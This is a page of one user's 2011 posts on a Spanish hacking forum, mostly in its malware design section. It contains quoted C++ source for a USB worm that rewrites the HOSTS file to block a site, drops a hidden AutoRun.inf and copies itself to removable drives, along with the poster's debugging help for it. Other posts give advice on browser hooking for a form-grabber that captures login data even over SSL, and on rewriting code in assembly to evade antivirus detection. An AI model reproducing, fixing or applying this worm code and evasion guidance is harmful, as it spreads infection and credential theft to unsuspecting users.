|
54
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Como funciona el formgrabber de un malware?
|
en: 14 Agosto 2011, 21:42 pm
|
Si, hookear es lo ideal. Incluso (YST lo hizo) hookeando algunas funciones no propias de windows (como HttpSendRequestA), sinó internas del navegador, se pueden obtener los datos incluso cuando se usa SSL. Y bueno, es cuestión de imaginación, hookando algunas API's que se encarguen de la gestión de memoria seguro que puedes capturar algo también. Lo malo de esto es que tienes que buscar la función adecuada para cada navegador, no es algo genérico.
Saludos
|
|
|
56
|
Foros Generales / Sugerencias y dudas sobre el Foro / Re: Cambio en foro "Linux"
|
en: 11 Agosto 2011, 22:24 pm
|
Yo estoy con vertex, BSD y MacOS no deben estar juntos y ser subforo de GNU/Linux. Sería como si en un foro "no-hacking" ponen "GNU/Linux" de subforo de Windows. Yo optaría por poner GNU/Linux a la altura del subforo de windows y hacer otro subforo "Otros", ya sea este subforo de GNU/Linux o a la misma altura que Windows (de esta última forma se podría nombrar a MacOS y BSD en la descripción del subforo).
Saludos
|
|
|
58
|
Seguridad Informática / Análisis y Diseño de Malware / Re: ayuda proyecto worm
|
en: 21 Julio 2011, 13:13 pm
|
Mirando por encima...Porque para definir las rutas de los arcvihos utilizas \\ ????? mira esto es lo que pones: strcat(hst, "\\Drivers\\ETC\\HOSTS"); .. strcat(dirX, "\\"); .. CreAut<<"shell\\Auto\\command=gusano.exe"<<endl; Si defines las rutas con esos palítos ni se copiará ni funcionará nunca en windows las rutas se defínen de la siguiente forma por ejemplo: c:/window/system32 En C, '\' es el caracter de escape, por lo que si quieres poner '\' en una cadena has de poner '\\'. hola a todos estoy de vuelta mi pregunta es que estoy haciendo mal por que no me esta infectando el usb este es mi codigo espero me puedan giar #include <cstdlib> #include <iostream> #include <windows.h> #include<fstream> #define PROCESSNAME "gusano.exe" //nombre del proceso
using namespace std; char me[1024]; HKEY hKey; char *drives[] = {"C:","D:","E:","F:","G:","H:","I:","J:","K:","L:", "M:","N:","O:","P:","Q:","R:","S:","T:","U:","V:", "W:","X:","Y:","Z:"}; void hst(void) { char hst[MAX_PATH]; DWORD byte; HANDLE hFile; BOOL bSuccess; GetSystemDirectory(hst, sizeof(hst)); strcat(hst, "\\Drivers\\ETC\\HOSTS"); const char* buffer = "127.0.0.1 www.entel.bo"; hFile = CreateFile(hst, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL); CloseHandle(hFile); }
//busqueda e infeccion del usb int FindDrv() { char *drives; char dirX[MAX_PATH]; char path[MAX_PATH]; char autorun[MAX_PATH]="AutoRun.inf"; ofstream CreAut; HMODULE GetQ; GetQ=GetModuleHandle(NULL); GetModuleFileName(GetQ,path,sizeof(path)); CreAut.open(dirX,ios_base::out); CreAut<<"[AutoRun]"<<endl; CreAut<<"open=gusano.exe"<<endl; CreAut<<"shellexecute=gusano.exe"<<endl; CreAut<<"shell\\Auto\\command=gusano.exe"<<endl; CreAut<<"shell=Auto"<<endl; CreAut.close(); SetFileAttributes(dirX,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY); UINT type= GetDriveType(drives); if(type == DRIVE_REMOVABLE) { strcpy(dirX, drives); strcat(dirX, "\\"); strcat(dirX, "gusano.exe"); CopyFile(path,dirX,TRUE); return 0; } return 0; } int main(int argc, char *argv[]) { hst(); FindDrv();
system("PAUSE"); // ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);
return EXIT_SUCCESS; } Fíjate que estás declarando dos veces la variable drives, una vez como variable global y luego en la función que infecta el USB, y en esta la declaras como un puntero que apunta a saber a donde, seguramente por eso no funciona. Te dejo un ejemplo que hice hace mucho tiempo por si te sirve: http://foro.elhacker.net/analisis_y_diseno_de_malware/srcc_infeccion_usb-t258426.0.html Y bueno, ten en cuenta que este método no funcionará en Windows 7. Saludos
|
|
|
59
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Indetectando AVIRA
|
en: 16 Julio 2011, 15:50 pm
|
Exacto, esas modificaciones que algunos hacéis con el editor hexadecimal es una tremenda gilipollez. Al cambiar los opcodes cambiais las instrucciones, que si los cambiais por valores cercanos (sumandole uno o restandole uno) puede funcionar (alomejor el 1% de las veces xD) de tremenda casualidad. La forma correcta de hacerlo es aprendiendo ASM y sustituyendo ese trozo de código por uno equivalente y diferente, usando Olly.
Saludos
|
|
|
60
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [MASM][UserMode]Hook OpenProcess
|
en: 16 Julio 2011, 00:34 am
|
The_wash esta re-inventando la rueda, hace rato que viene rehaciendo los tutoriales y codigos que ya estan hechos. Es la única forma de aprender, no me gusta nada la gente que piensa de esa forma. Yo recibí ese tipo de críticas en algunos foros y me ponen enfermo, si no experimentas las cosas no aprendes, es el proceso lo más importante, no el resultado. Saludos
|
|
|
|
|
|
|